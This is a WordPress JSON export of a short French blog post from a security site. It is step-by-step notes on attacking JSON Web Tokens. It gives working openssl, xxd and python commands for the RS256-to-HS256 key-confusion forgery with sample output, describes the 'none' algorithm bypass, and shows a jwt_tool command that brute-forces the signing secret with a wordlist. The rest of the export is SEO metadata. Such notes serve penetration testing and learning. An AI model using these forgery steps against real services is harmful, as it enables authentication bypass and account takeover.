{"id":675,"date":"2021-07-28T13:16:28","date_gmt":"2021-07-28T18:16:28","guid":{"rendered":"https:\/\/www.searchevolution.com\/security\/?p=675"},"modified":"2022-04-27T07:46:16","modified_gmt":"2022-04-27T12:46:16","slug":"vulnerabilite-dans-les-tokens-jwt","status":"publish","type":"post","link":"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/","title":{"rendered":"Vuln\u00e9rabilit\u00e9 dans les tokens JWT"},"content":{"rendered":"

Structure d’un token<\/p>\n

header.payload.secret<\/p>\n

Les sections sont encod\u00e9s en base64<\/p>\n

Structure d’un header<\/p>\n

{“typ”:”JWT”,”alg”:”RS256″}<\/p>\n

Si on a la cl\u00e9 publique du serveur, on peut r\u00e9encoder le token<\/p>\n

-Changer l’algorithme dans le header par HS256<\/em> (HS256 est sym\u00e9trique, rs256 est asym\u00e9trique)
\ncat a.pem | xxd – p | tr -d “\\\\n” (convertit la cl\u00e9 publique du serveur “a.pem” au format hexad\u00e9cimal pour utilisation avec openssl \u00e0 l’\u00e9tape suivante)<\/p>\n

G\u00e9n\u00e9rer une signature HMAC avec notre cl\u00e9 g\u00e9n\u00e9r\u00e9e pr\u00e9c\u00e9demment et le token \u00e9dit\u00e9 (les deux premi\u00e8res sections)
\necho -n “eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ” | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505[STRIPPED]592d2d2d2d2d0a<\/p>\n

(stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0<\/p>\n

Convertit la signature en base64
\n$ python2 -c “exec(\\”import base64, binascii\\nprint base64.urlsafe_b64encode(binascii.a2b_hex(‘8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0’)).replace(‘=’,”)\\”)”<\/p>\n

Ajouter la signature
\n[HEADER EDITED RS256 TO HS256].[DATA EDITED].[SIGNATURE]<\/p>\n

Il est plus facile d’utiliser l’outil TokenBreaker<\/a><\/strong><\/p>\n

Autre exploit<\/strong>
\nChanger le type d’encryption \u00e0 None<\/p>\n

le formation du token est maintenant header.payload. (le dernier point est n\u00e9cessaire)<\/p>\n

Attention!<\/strong><\/p>\n

Certains serveurs ne reconnaissent pas les parties du token si on ne met pas de saut \u00e0 la ligne apr\u00e8s avoir modifi\u00e9 le contenu (\u00e0 la suite du }). S’applique au header ainsi qu’au payload <\/strong><\/p>\n

Tenter de trouver la cl\u00e9 (secret) d’un token. Il est possible aussi de modifier et resigner un token avec cet outil
\npython3 jwt_tool.py letoken -d \/usr\/share\/wordlists\/r0ckyou.txt -C<\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"

Structure d’un token header.payload.secret Les sections sont encod\u00e9s en base64 Structure d’un header {“typ”:”JWT”,”alg”:”RS256″} Si on a la cl\u00e9 publique du serveur, on peut r\u00e9encoder le token -Changer l’algorithme dans le header par HS256 (HS256 est sym\u00e9trique, rs256 est asym\u00e9trique) cat a.pem | xxd – p | tr -d “\\\\n” (convertit la cl\u00e9 publique du serveur “a.pem” au format hexad\u00e9cimal pour utilisation avec openssl \u00e0 l’\u00e9tape suivante) G\u00e9n\u00e9rer une signature HMAC avec notre cl\u00e9 g\u00e9n\u00e9r\u00e9e pr\u00e9c\u00e9demment et le token \u00e9dit\u00e9 (les deux premi\u00e8res sections) echo -n “eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ” | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505592d2d2d2d2d0a (stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0 Convertit la signature <\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"yoast_head":"\nVuln\u00e9rabilit\u00e9 dans les tokens JWT - S\u00e9curiser votre site<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/\" \/>\n<meta property=\"og:locale\" content=\"fr_CA\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Vuln\u00e9rabilit\u00e9 dans les tokens JWT - S\u00e9curiser votre site\" \/>\n<meta property=\"og:description\" content=\"Structure d’un token header.payload.secret Les sections sont encod\u00e9s en base64 Structure d’un header {“typ”:”JWT”,”alg”:”RS256″} Si on a la cl\u00e9 publique du serveur, on peut r\u00e9encoder le token -Changer l’algorithme dans le header par HS256 (HS256 est sym\u00e9trique, rs256 est asym\u00e9trique) cat a.pem | xxd – p | tr -d “\\n” (convertit la cl\u00e9 publique du serveur “a.pem” au format hexad\u00e9cimal pour utilisation avec openssl \u00e0 l’\u00e9tape suivante) G\u00e9n\u00e9rer une signature HMAC avec notre cl\u00e9 g\u00e9n\u00e9r\u00e9e pr\u00e9c\u00e9demment et le token \u00e9dit\u00e9 (les deux premi\u00e8res sections) echo -n “eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ” | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505592d2d2d2d2d0a (stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0 Convertit la signature\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/\" \/>\n<meta property=\"og:site_name\" content=\"S\u00e9curiser votre site\" \/>\n<meta property=\"article:published_time\" content=\"2021-07-28T18:16:28+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-04-27T12:46:16+00:00\" \/>\n<meta name=\"author\" content=\"Germain\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Germain\" \/>\n\t<meta name=\"twitter:label2\" content=\"Estimation du temps de lecture\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/\",\"url\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/\",\"name\":\"Vuln\u00e9rabilit\u00e9 dans les tokens JWT - S\u00e9curiser votre site\",\"isPartOf\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\"},\"datePublished\":\"2021-07-28T18:16:28+00:00\",\"dateModified\":\"2022-04-27T12:46:16+00:00\",\"author\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/#breadcrumb\"},\"inLanguage\":\"fr-CA\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.searchevolution.com\/security\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Vuln\u00e9rabilit\u00e9 dans les tokens JWT\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#website\",\"url\":\"https:\/\/www.searchevolution.com\/security\/\",\"name\":\"S\u00e9curiser votre site\",\"description\":\"Conna\u00eetre son ennemi\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"fr-CA\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8\",\"name\":\"Germain\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-CA\",\"@id\":\"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g\",\"caption\":\"Germain\"},\"sameAs\":[\"https:\/\/www.searchevolution.com\/security\"],\"url\":\"https:\/\/www.searchevolution.com\/security\/author\/germain\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Vuln\u00e9rabilit\u00e9 dans les tokens JWT - S\u00e9curiser votre site","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/","og_locale":"fr_CA","og_type":"article","og_title":"Vuln\u00e9rabilit\u00e9 dans les tokens JWT - S\u00e9curiser votre site","og_description":"Structure d’un token header.payload.secret Les sections sont encod\u00e9s en base64 Structure d’un header {“typ”:”JWT”,”alg”:”RS256″} Si on a la cl\u00e9 publique du serveur, on peut r\u00e9encoder le token -Changer l’algorithme dans le header par HS256 (HS256 est sym\u00e9trique, rs256 est asym\u00e9trique) cat a.pem | xxd – p | tr -d “\\n” (convertit la cl\u00e9 publique du serveur “a.pem” au format hexad\u00e9cimal pour utilisation avec openssl \u00e0 l’\u00e9tape suivante) G\u00e9n\u00e9rer une signature HMAC avec notre cl\u00e9 g\u00e9n\u00e9r\u00e9e pr\u00e9c\u00e9demment et le token \u00e9dit\u00e9 (les deux premi\u00e8res sections) echo -n “eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpZCI6IjIzIiwidXNlcm5hbWUiOiJ2aXNpdG9yIiwicm9sZSI6IjEifQ” | openssl dgst -sha256 -mac HMAC -macopt hexkey:2d2d2d2d2d424547494e20505592d2d2d2d2d0a (stdin)= 8f421b351eb61ff226df88d526a7e9b9bb7b8239688c1f862f261a0c588910e0 Convertit la signature","og_url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/","og_site_name":"S\u00e9curiser votre site","article_published_time":"2021-07-28T18:16:28+00:00","article_modified_time":"2022-04-27T12:46:16+00:00","author":"Germain","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Germain","Estimation du temps de lecture":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/","url":"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/","name":"Vuln\u00e9rabilit\u00e9 dans les tokens JWT - S\u00e9curiser votre site","isPartOf":{"@id":"https:\/\/www.searchevolution.com\/security\/#website"},"datePublished":"2021-07-28T18:16:28+00:00","dateModified":"2022-04-27T12:46:16+00:00","author":{"@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8"},"breadcrumb":{"@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/#breadcrumb"},"inLanguage":"fr-CA","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.searchevolution.com\/security\/2021\/07\/28\/vulnerabilite-dans-les-tokens-jwt\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.searchevolution.com\/security\/"},{"@type":"ListItem","position":2,"name":"Vuln\u00e9rabilit\u00e9 dans les tokens JWT"}]},{"@type":"WebSite","@id":"https:\/\/www.searchevolution.com\/security\/#website","url":"https:\/\/www.searchevolution.com\/security\/","name":"S\u00e9curiser votre site","description":"Conna\u00eetre son ennemi","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.searchevolution.com\/security\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"fr-CA"},{"@type":"Person","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/e1318e0782dc5a7d6b03471347f881d8","name":"Germain","image":{"@type":"ImageObject","inLanguage":"fr-CA","@id":"https:\/\/www.searchevolution.com\/security\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/6a203854efbec130dd49471ccbba1abc?s=96&d=mm&r=g","caption":"Germain"},"sameAs":["https:\/\/www.searchevolution.com\/security"],"url":"https:\/\/www.searchevolution.com\/security\/author\/germain\/"}]}},"jetpack_featured_media_url":"","_links":{"self":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/675"}],"collection":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/comments?post=675"}],"version-history":[{"count":7,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/675\/revisions"}],"predecessor-version":[{"id":687,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/posts\/675\/revisions\/687"}],"wp:attachment":[{"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/media?parent=675"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/categories?post=675"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.searchevolution.com\/security\/wp-json\/wp\/v2\/tags?post=675"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}